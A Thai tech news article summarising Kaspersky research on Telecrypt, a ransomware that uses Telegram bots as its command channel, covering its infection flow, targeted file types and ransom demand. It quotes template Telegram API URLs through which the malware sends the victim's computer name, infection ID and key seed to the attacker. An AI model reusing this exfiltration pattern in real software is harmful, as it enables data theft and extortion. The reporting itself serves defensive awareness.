Breaking News

พบ Ransomware ตัวใหม่ ใช้ Telegram เป็น C&C Server

kaspersky_logo

นักวิจัยด้านความมั่นคงปลอดภัยจาก Kaspersky Lab ออกมาเปิดเผยถึง Ransomware ตัวใหม่ล่าสุด ชื่อว่า Telecrypt ซึ่งใช้ช่องทางของ Telegram แอพพลิเคชันสำหรับรับส่งข้อความที่มีความมั่นคงปลอดภัยสูง ในการส่งข้อมูลระหว่างมัลแวร์และแฮ็คเกอร์

Credit: Nicescene/ShutterStock
Credit: Nicescene/ShutterStock

Telecrypt ถูกพัฒนาขึ้นโดยใช้ภาษา Delphi ซึ่ง Binary มีขนาดเพียง 3 MB เท่านั้น หลังจากที่ Telecrypt ถูกติดตั้งลงบนเครื่องของเหยื่อแล้ว มันจะทำการสร้าง Telegram Bot ผ่านทาง Telegram API ซึ่ง Bot แต่ละตัวจะมี Token ID ที่ได้จาก API เป็นของตัวเอง

หลังจากที่เหยื่อกดรัน Telecrypt Binary ตัว Telegram Bot จะทำการ Ping ไปยัง Telegram API ผ่านทาง https://api.telegram.org/bot/GetMe เพื่อให้มั่นใจว่า Telegram Bot ยังคงทำงานได้ และไม่ถูก Telegram Admin จัดการ จากนั้น Telecrypt จะใช้โปรโตคอลของ Telegram ในการส่งข้อความผ่านเข้าไปยังช่องทางของ Telegram โดยใช้ Token ID ที่ได้รับมากในตอนแรก ซึ่งข้อความที่ส่งออกไปประกอบด้วย Computer Name, Infection ID และ Key Seed ซึ่งเป็นชุดตัวเลขที่ใช้เป็นกุญแจสำหรับเข้ารหัสไฟล์ข้อมูล

https://api.telegram.org/bot< token >/sendmessage?chat_id=< chat >&text=< computer_name >_< infection_id >_< key_seed >

ถัดมา Telecrypt จะทำการค้นหาไฟล์ข้อมูล ได้แก่ DOC, DOCX, XLS, XLSX, JPG, JPEG, PNG, DT, DBF, CD และ PDF เพื่อทำการเข้ารหัส ซึ่งบางเวอร์ชันจะไม่ใส่นามสกุลใดต่อท้ายไฟล์ แต่บางเวอร์ชันจะใส่นามสกุล .Xcri เพิ่มเข้าไป เมื่อเข้ารหัสไฟล์ทั้งหมดเสร็จเรียบร้อย Telecrypt จะส่งข้อความไปช่องทางเดิม แต่เพิ่มพารามิเตอร์ Stop เข้าไปด้วย

https://api.telegram.org/bot< token >/sendmessage?chat_id=< chat >&text=< computer_name >_< infection_id >_< key_seed >stop

จากนั้น Telecrypt จะดาวน์โหลดไฟล์ Xhelp.exe มาติดตั้งลงบนเครื่องของเหยื่อเพื่อแสดงข้อความเรียกค่าไถ่ดังรูปด้านล่าง

ข้อความเรียกค่าไถ่
ข้อความเรียกค่าไถ่
ระบุให้ชำระเงินผ่านทาง Yandex.Money หรือ Qiwi
ระบุให้ชำระเงินผ่านทาง Yandex.Money หรือ Qiwi
หลังปลดรหัสจะระบุข้อความ "ขอบคุณที่ช่วยสนับสนุนเงินทุนให้แก่โปรแกรมเมอร์ตัวน้อยๆ "
หลังปลดรหัสจะระบุข้อความ “ขอบคุณที่ช่วยสนับสนุนเงินทุนให้แก่โปรแกรมเมอร์ตัวน้อยๆ “

ข้อความเรียกค่าไถ่ถูกเขียนในภาษารัสเซีย และเรียกร้องเงินจำนวน 5,000 Rubles หรือประมาณ 2,800 บาท เพื่อปลดรหัสไฟล์ โดยให้ชำระเงินผ่านทาง Yandex.Money หรือ Qiwi ซึ่งเป็นช่องทางการชำระเงินยอดนิยมของรัสเซีย

ที่มา: https://securelist.com/blog/research/76558/the-first-cryptor-to-exploit-telegram/


About techtalkthai

ทีมงาน TechTalkThai เป็นกลุ่มบุคคลที่ทำงานในสาย Enterprise IT ที่มีความเชี่ยวชาญทางด้าน Network, Security, Server, Storage, Operating System และ Virtualization มารวมตัวกันเพื่ออัพเดตข่าวสารทางด้าน Enterprise IT ให้แก่ชาว IT ในไทยโดยเฉพาะ

Check Also

Oracle โชว์ Supercomputer ใหม่ ใช้ Rasberry Pi 1,060 เครื่องร่วมกับ Autonomous Linux

ในงาน Oracle OpenWorld ที่จัดขึ้นในวันจันทร์ที่ผ่านมานี้ ทาง Oracle ได้จัดแสดง Supercomputer ที่ใช้ Raspberry Pi จำนวน 1,060 เครื่องที่ติดตั้ง Oracle Autonomous Linux มาทำงานร่วมกัน ด้วยการให้เหตุผลว่า Cluster ใหญ่ๆ มันเท่ดี (...a big cluster is cool.)

SD-WAN as a Service ของ Juniper Networks ปรับภาพลักษณ์ใหม่แก่สำนักงานสาขาขององค์กร

ปัจจุบันนี้ Contrail Service Orchestration ของ Juniper สามารถบริหารจัดการ SD-WAN ของสำนักงานสาขาขององค์กร แคมปัส และคลาวด์ ได้เรียบร้อยแล้ว รวมไปถึงมีการเพิ่มความมั่นคงปลอดภัยให้แก่สำนักงานสาขา, LAN และ …